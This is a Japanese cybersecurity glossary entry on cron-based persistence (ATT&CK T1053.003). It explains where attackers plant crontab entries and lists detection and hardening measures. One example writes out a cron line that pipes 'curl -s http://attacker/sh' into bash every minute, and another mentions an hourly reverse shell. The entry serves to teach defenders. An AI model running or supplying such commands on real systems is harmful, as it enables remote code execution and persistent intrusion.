Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
日本語
Entry № 238

cron による持続化

cron による持続化 とは何ですか?

cron による持続化cron、anacron、systemd タイマーを利用し、攻撃者コードを所定の間隔やシステム イベントで再実行させる Linux / Unix の持続化手法。

cron 持続化(MITRE ATT&CK T1053.003)は、Unix の cron デーモンと派生(anacron、fcron、systemd タイマー)を悪用します。攻撃者は /etc/crontab、/etc/cron.d/、/etc/cron.{hourly,daily,weekly,monthly}/、各ユーザーの crontab(crontab -e)にエントリを追加します。代表的なペイロードはワンライナーのリバース シェル、curl ダウンローダー、/tmp に置いたスクリプトなどです。cron は root や所有ユーザーで動作するため、初期侵入後の展開は容易かつ確実です。検出には cron ディレクトリの整合性監視、auditd のウォッチ、想定タスクのベースライン化、cron から派生するシェルへの EDR アラートが有効です。堅牢化策は crontab メンバーの制限、/tmp の noexec マウント、利用可能なら systemd-cron 監査の有効化です。

  1. 01

    /etc/cron.d/update に * * * * * curl -s http://attacker/sh | bash を追加する。

  2. 02

    /etc/cron.hourly/ にスクリプトを配置し、1 時間ごとにリバース シェルを再接続する。

よくある質問

cron による持続化 とは何ですか?

cron、anacron、systemd タイマーを利用し、攻撃者コードを所定の間隔やシステム イベントで再実行させる Linux / Unix の持続化手法。 サイバーセキュリティの 攻撃と脅威 カテゴリに属します。

cron による持続化 とはどういう意味ですか?

cron、anacron、systemd タイマーを利用し、攻撃者コードを所定の間隔やシステム イベントで再実行させる Linux / Unix の持続化手法。

cron による持続化 はどのように機能しますか?

cron 持続化(MITRE ATT&CK T1053.003)は、Unix の cron デーモンと派生(anacron、fcron、systemd タイマー)を悪用します。攻撃者は /etc/crontab、/etc/cron.d/、/etc/cron.{hourly,daily,weekly,monthly}/、各ユーザーの crontab(crontab -e)にエントリを追加します。代表的なペイロードはワンライナーのリバース シェル、curl ダウンローダー、/tmp に置いたスクリプトなどです。cron は root や所有ユーザーで動作するため、初期侵入後の展開は容易かつ確実です。検出には cron ディレクトリの整合性監視、auditd のウォッチ、想定タスクのベースライン化、cron から派生するシェルへの EDR アラートが有効です。堅牢化策は crontab メンバーの制限、/tmp の noexec マウント、利用可能なら systemd-cron 監査の有効化です。

cron による持続化 からどのように防御しますか?

cron による持続化 に対する防御は通常、上記の定義で述べたとおり、技術的統制と運用上の実践を組み合わせます。

cron による持続化 の別名は何ですか?

一般的な別名: crontab 持続化, anacron 持続化。

関連用語